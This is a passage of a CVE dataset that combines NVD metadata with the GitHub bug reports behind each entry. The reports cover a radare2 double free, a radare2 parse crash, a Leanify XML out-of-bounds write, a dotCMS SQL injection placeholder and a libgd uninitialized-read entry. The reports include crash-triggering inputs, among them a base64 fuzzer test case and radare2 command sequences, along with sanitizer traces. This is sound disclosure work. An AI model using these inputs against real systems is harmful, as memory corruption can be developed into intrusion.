a1ade7d875057c5f6d6047decfcd251e6d1c4495 build: 2019-06-15__00:21:43 ### Expected behavior NO CRASH ### Actual behavior ```bash $ rasm2 -d -a x86 -b 64 -F :x86.pseudo a6 while (CX != 0) { var = *(DS*16 + SI) - *(ES*16 + DI); SI++; DI++; CX--; if (!var) break; } double free or corruption (out) Aborted (core dumped) ``` ### Steps to reproduce the behavior - Follow actions mentioned above. ### Additional Logs, screenshots, source-code, configuration dump, ... Output of valgrind: [valgrind.txt](https://github.com/radare/radare2/files/3292715/valgrind.txt)
Function r_parse_parse Lacks Boundary Check
https://api.github.com/repos/radareorg/radare2/issues/14303/comments
3
2019-06-15T04:49:02Z
2019-06-15T11:24:09Z
https://github.com/radareorg/radare2/issues/14303
456,499,551
14,303
423
CVE-2019-12835
2019-06-15T19:29:00.173
formats/xml.cpp in Leanify 0.4.3 allows for a controlled out-of-bounds write in xml_memory_writer::write via characters that require escaping.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JayXon/Leanify/issues/52" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JayXon/Leanify/issues/52" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:leanify_project:leanify:0.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "08AC077C-4E5F-49EB-8429-B16451564D34", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/JayXon/Leanify/issues/52
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "JayXon", "Leanify" ]
Controlled Length Out of Bounds Write Using the corpus of test files from the previous crash I also included an XML file. The crash is relative to the XML library implementation of Leanify resulting in another issue with an OOB write independent of the fixed OOB Read/Write in ICO. I discovered this via fuzzing and did some light root cause analysis and another party heavily expanded on the exploitability of this issue. Details below: **A moderately controllable memory corruption vulnerability affects the implementation of xml_memory_writer in formats/xml.cpp:179 as shown below:** ++ struct xml_memory_writer : pugi::xml_writer { uint8_t* p_write; void write(const void* data, size_t size) override { memcpy(p_write, data, size); # Line 179 p_write += size; } }; } // namespace **pugi::xml_writer implementations should additionally track the capacity of the target buffer as shown in the pugixml documentation here:** https://pugixml.org/docs/samples/save_custom_writer.cpp **It is possible to control the amount of data written past the end of the buffer by appending characters that require escaping as shown in the text_output_escaped function in pugixml.cpp:3906 as shown below:** ++ PUGI__FN void text_output_escaped(xml_buffered_writer& writer, const char_t* s, chartypex_t type, unsigned int flags) { /* TRUNCATED */ switch (*s) { case 0: break; case '&': writer.write('&', 'a', 'm', 'p', ';'); ++s; break; case '<': writer.write('&', 'l', 't', ';'); ++s; break; case '>': writer.write('&', 'g', 't', ';'); ++s; break; case '"': writer.write('&', 'q', 'u', 'o', 't', ';'); ++s; break; default: // s is not a usual symbol { unsigned int ch = static_cast<unsigned int>(*s++); assert(ch < 32); if (!(flags & format_skip_control_chars)) writer.write('&', '#', static_cast<char_t>((ch / 10) + '0'), static_cast<char_t>((ch % 10) + '0'), ';'); } /* TRUNCATED */ **The following base64 test case will crash the target binary by expanding a number of & to the escaped &amp; (a gain of 4 bytes in extension).** PHBlcnNvbiBpZD0iPgombmFtYW5nciBSb2FDL2RpdBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQECYm JiYmJiYmJiYmJiZ5JnkmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYm JiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYm JiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYm JiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYm JyYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYm JiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYm JiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYm JiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYm JiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYm JiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYm JiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYm JiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYm JiYmJiYmJiYmJiYmJiYmJkhFQVBfT1ZFUkZMT1cmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYm JiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYm EBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBBpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlp aWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlsaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaXdpaWlp aWlpEBgQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEGdhIFJvYUMvZGl0eT4KEBAQEBAQEBAQ EBBpaWlpaWlpaWlpaWlpaWlDaXR5PkghbmdhYXN0ZXIgSXNhaWxzLiAsIj4KPC9wZXJzb24+Cg== **For full stack trace on the crash, see the ASAN output below:** ================================================================= ==461==ERROR: AddressSanitizer: unknown-crash on address 0xb7fce000 at pc 0xb7af7a42 bp 0xbfffc8f8 sp 0xbfffc4cc WRITE of size 518 at 0xb7fce000 thread T0 #0 0xb7af7a41 in __asan_memcpy (/usr/lib/i386-linux-gnu/libasan.so.2+0x8aa41) #1 0xb7af7c2f in memcpy (/usr/lib/i386-linux-gnu/libasan.so.2+0x8ac2f) #2 0x819a38c in (anonymous namespace)::xml_memory_writer::write(void const*, unsigned int) [clone .lto_priv.243] formats/xml.cpp:179 #3 0x80d927e in flush lib/pugixml/pugixml.cpp:3716 #4 0x80d9106 in pugi::impl::(anonymous namespace)::xml_buffered_writer::flush() [clone .lto_priv.561] lib/pugixml/pugixml.cpp:3705 #5 0x80bfed4 in pugi::xml_document::save(pugi::xml_writer&, char const*, unsigned int, pugi::xml_encoding) const lib/pugixml/pugixml.cpp:7168 #6 0x819b5fe in Xml::Leanify(unsigned int) formats/xml.cpp:307 #7 0x81af203 in LeanifyFile(void*, unsigned int, unsigned int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const &) /root/Leanify/leanify.cpp:140 #8 0x81b08c2 in ProcessFile /root/Leanify/main.cpp:53 #9 0x81b1cde in main /root/Leanify/main.cpp:230 #10 0xb76e6636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) #11 0x804b650 (/root/Leanify/leanify+0x804b650) The testfile was generated using the AFL fuzzer by lcamtuf.
Fuzzing Tests: OOB Write in XML Parser
https://api.github.com/repos/JayXon/Leanify/issues/52/comments
0
2019-05-24T18:22:27Z
2019-06-07T02:27:12Z
https://github.com/JayXon/Leanify/issues/52
448,298,334
52
424
CVE-2019-12865
2019-06-17T23:15:13.130
In radare2 through 3.5.1, cmd_mount in libr/core/cmd_mount.c has a double free for the ms command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/radare/radare2/issues/14334" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IEXZWAMVKGZKHALV4IVWQS2ORJKRH57U/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/radare/radare2/issues/14334" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IEXZWAMVKGZKHALV4IVWQS2ORJKRH57U/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "0EAF4EA5-271D-41A3-902C-1E640CBF03C3", "versionEndExcluding": null, "versionEndIncluding": "3.5.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "415" ]
415
https://github.com/radare/radare2/issues/14334
[ "Exploit", "Third Party Advisory" ]
github.com
[ "radare", "radare2" ]
Function [cmd_mount](https://github.com/radare/radare2/blob/a49bb7cf6698ed4fded0f36b12e019e61df1d2f8/libr/core/cmd_mount.c#L460) would **Double Free** [cwd](https://github.com/radare/radare2/blob/f10da2e8ef/libr/core/cmd_mount.c#L475) via malicious commands. Basically, first command `ms` to get in [fs_shell](https://github.com/radare/radare2/blob/a49bb7cf66/libr/fs/shell.c#L30) would cause [cwd = strdup(path)](https://github.com/radare/radare2/blob/a49bb7cf66/libr/fs/shell.c#L58). After returning from fs_shell, r2 will [free cwd](https://github.com/radare/radare2/blob/f10da2e8ef/libr/core/cmd_mount.c#L475). Note that cwd is not reset as NULL. Later, command `ms UNKNOWN_ROOT` would let r2 goes into [r_fs_shell_prompt](https://github.com/radare/radare2/blob/a49bb7cf66/libr/fs/shell.c#L30), but returns [here](https://github.com/radare/radare2/blob/a49bb7cf66/libr/fs/shell.c#L48) without resetting `cwd`. Then, `cwd` is double-freed. ### Work environment | Questions | Answers |------------------------------------------------------|-------------------- | OS/arch/bits (mandatory) | Ubuntu x86 64 | File format of the file you reverse (mandatory) | malloc://1024 | Architecture/bits of the file (mandatory) | None | r2 -v full output, **not truncated** (mandatory) | radare2 3.6.0-git 22086 @ linux-x86-64 git.3.5.1-263-g762b8e2d5 commit: 762b8e2d50ffff49354511dab0203cdf8187c84f build: 2019-06-17__01:02:19 ### Expected behavior NO CRASH ### Actual behavior ```bash $ r2 malloc://1024 -- When can we have an official anime mascot for radare2? [0x00000000]> ms [/]> q [0x00000000]> ms UNKNOWN_ROOT Unknown root [0x00000000]> ms UNKNOWN_ROOT Unknown root double free or corruption (out) Aborted (core dumped) ``` ### Steps to reproduce the behavior - Follow actions mentioned above ### Additional Logs, screenshots, source-code, configuration dump, ... This double-free could be fixed by replacing `free` as `R_FREE` [here](https://github.com/radare/radare2/blob/f10da2e8ef/libr/core/cmd_mount.c#L475) Output of valgrind ```base ==16657== HEAP SUMMARY: ==16657== in use at exit: 35,522 bytes in 104 blocks ==16657== total heap usage: 82,780 allocs, 82,677 frees, 51,399,803 bytes allocated ==16657== ==16657== Searching for pointers to 104 not-freed blocks ==16657== Checked 5,500,360 bytes ==16657== ==16657== LEAK SUMMARY: ==16657== definitely lost: 4,775 bytes in 70 blocks ==16657== indirectly lost: 30,667 bytes in 32 blocks ==16657== possibly lost: 0 bytes in 0 blocks ==16657== still reachable: 80 bytes in 2 blocks ==16657== suppressed: 0 bytes in 0 blocks ==16657== Rerun with --leak-check=full to see details of leaked memory ==16657== ==16657== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) ==16657== ==16657== 1 errors in context 1 of 1: ==16657== Invalid free() / delete / delete[] / realloc() ==16657== at 0x4C30D3B: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==16657== by 0x6F03883: cmd_mount (cmd_mount.c:474) ==16657== by 0x6F8F524: r_cmd_call (cmd_api.c:244) ==16657== by 0x6F3BC16: r_core_cmd_subst_i (cmd.c:3279) ==16657== by 0x6F3801F: r_core_cmd_subst (cmd.c:2175) ==16657== by 0x6F3EA0A: r_core_cmd (cmd.c:4114) ==16657== by 0x6E90C88: r_core_prompt_exec (core.c:2817) ==16657== by 0x4E5930A: r_main_radare2 (radare2.c:1473) ==16657== by 0x108739: main (radare2.c:48) ==16657== Address 0xb9ef460 is 0 bytes inside a block of size 2 free'd ==16657== at 0x4C30D3B: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==16657== by 0x6F03883: cmd_mount (cmd_mount.c:474) ==16657== by 0x6F8F524: r_cmd_call (cmd_api.c:244) ==16657== by 0x6F3BC16: r_core_cmd_subst_i (cmd.c:3279) ==16657== by 0x6F3801F: r_core_cmd_subst (cmd.c:2175) ==16657== by 0x6F3EA0A: r_core_cmd (cmd.c:4114) ==16657== by 0x6E90C88: r_core_prompt_exec (core.c:2817) ==16657== by 0x4E5930A: r_main_radare2 (radare2.c:1473) ==16657== by 0x108739: main (radare2.c:48) ==16657== Block was alloc'd at ==16657== at 0x4C2FB0F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==16657== by 0x51669B9: strdup (strdup.c:42) ==16657== by 0x94E2BDB: r_fs_shell_prompt (shell.c:58) ==16657== by 0x6F03874: cmd_mount (cmd_mount.c:473) ==16657== by 0x6F8F524: r_cmd_call (cmd_api.c:244) ==16657== by 0x6F3BC16: r_core_cmd_subst_i (cmd.c:3279) ==16657== by 0x6F3801F: r_core_cmd_subst (cmd.c:2175) ==16657== by 0x6F3EA0A: r_core_cmd (cmd.c:4114) ==16657== by 0x6E90C88: r_core_prompt_exec (core.c:2817) ==16657== by 0x4E5930A: r_main_radare2 (radare2.c:1473) ==16657== by 0x108739: main (radare2.c:48) ==16657== ==16657== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) ```
Double-Free in cmd_mount Causes Crash
https://api.github.com/repos/radareorg/radare2/issues/14334/comments
4
2019-06-17T05:08:54Z
2019-06-19T00:07:11Z
https://github.com/radareorg/radare2/issues/14334
456,745,292
14,334
425
CVE-2019-12872
2019-06-18T14:15:11.963
dotCMS before 5.1.6 is vulnerable to a SQL injection that can be exploited by an attacker of the role Publisher via view_unpushed_bundles.jsp.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://dotcms.com/security/SI-53" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/dotCMS/core/issues/16624" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://dotcms.com/security/SI-53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/dotCMS/core/issues/16624" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:*", "matchCriteriaId": "BD436941-B39F-4587-BCAD-D2A9F422F19F", "versionEndExcluding": "5.1.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/dotCMS/core/issues/16624
[ "Third Party Advisory" ]
github.com
[ "dotCMS", "core" ]
This is a placeholder for a reported security issue - details can be be found here: https://docs.google.com/document/d/1XbruRRlPAIiayZdcqo0bFqcLlwdiOncDcbY2KwmGL2Y/edit
PlaceHolder for Security Issue
https://api.github.com/repos/dotCMS/core/issues/16624/comments
1
2019-05-28T15:06:21Z
2019-06-11T20:01:16Z
https://github.com/dotCMS/core/issues/16624
449,324,640
16,624
426
CVE-2019-11038
2019-06-19T00:15:12.360
When using the gdImageCreateFromXbm() function in the GD Graphics Library (aka LibGD) 2.2.5, as used in the PHP GD extension in PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and 7.3.x below 7.3.6, it is possible to supply data that will cause the function to use the value of uninitialized variable. This may lead to disclosing contents of the stack that has been left there by previous code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.0" }, "exploitabilityScore": 1.6, "impactScore": 1.4, "source": "security@php.net", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security@php.net", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00020.html" }, { "source": "security@php.net", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:2519" }, { "source": "security@php.net", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3299" }, { "source": "security@php.net", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=929821" }, { "source": "security@php.net", "tags": [ "Vendor Advisory" ], "url": "https://bugs.php.net/bug.php?id=77973" }, { "source": "security@php.net", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1724149" }, { "source": "security@php.net", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1724432" }, { "source": "security@php.net", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.suse.com/show_bug.cgi?id=1140118" }, { "source": "security@php.net", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.suse.com/show_bug.cgi?id=1140120" }, { "source": "security@php.net", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libgd/libgd/issues/501" }, { "source": "security@php.net", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00003.html" }, { "source": "security@php.net", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3CZ2QADQTKRHTGB2AHD7J4QQNDLBEMM6/" }, { "source": "security@php.net", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PKSSWFR2WPMUOIB5EN5ZM252NNEPYUTG/" }, { "source": "security@php.net", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WAZBVK6XNYEIN7RDQXESSD63QHXPLKWL/" }, { "source": "security@php.net", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://seclists.org/bugtraq/2019/Sep/38" }, { "source": "security@php.net", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4316-1/" }, { "source": "security@php.net", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4316-2/" }, { "source": "security@php.net", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2019/dsa-4529" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:2519" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3299" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=929821" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://bugs.php.net/bug.php?id=77973" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1724149" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1724432" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.suse.com/show_bug.cgi?id=1140118" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.suse.com/show_bug.cgi?id=1140120" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libgd/libgd/issues/501" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00003.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3CZ2QADQTKRHTGB2AHD7J4QQNDLBEMM6/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PKSSWFR2WPMUOIB5EN5ZM252NNEPYUTG/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WAZBVK6XNYEIN7RDQXESSD63QHXPLKWL/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://seclists.org/bugtraq/2019/Sep/38" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4316-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4316-2/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2019/dsa-4529" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libgd:libgd:2.2.5:*:*:*:*:*:*:*", "matchCriteriaId": "C257CC1C-BF6A-4125-AA61-9C2D09096084", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:php:php:*:*:*:*:*:*:*:*", "matchCriteriaId": "56CFABDE-1BA0-42D1-B38E-A08F27B2BF16", "versionEndExcluding": "7.1.30", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:php:php:*:*:*:*:*:*:*:*", "matchCriteriaId": "2537B4A2-025F-4641-AFCF-82E492378C12", "versionEndExcluding": "7.2.19", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:php:php:*:*:*:*:*:*:*:*", "matchCriteriaId": "B91B8478-BF61-468E-A7CC-5F418DDF2EB6", "versionEndExcluding": "7.3.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.3.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "matchCriteriaId": "815D70A8-47D3-459C-A32C-9FEACA0659D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": 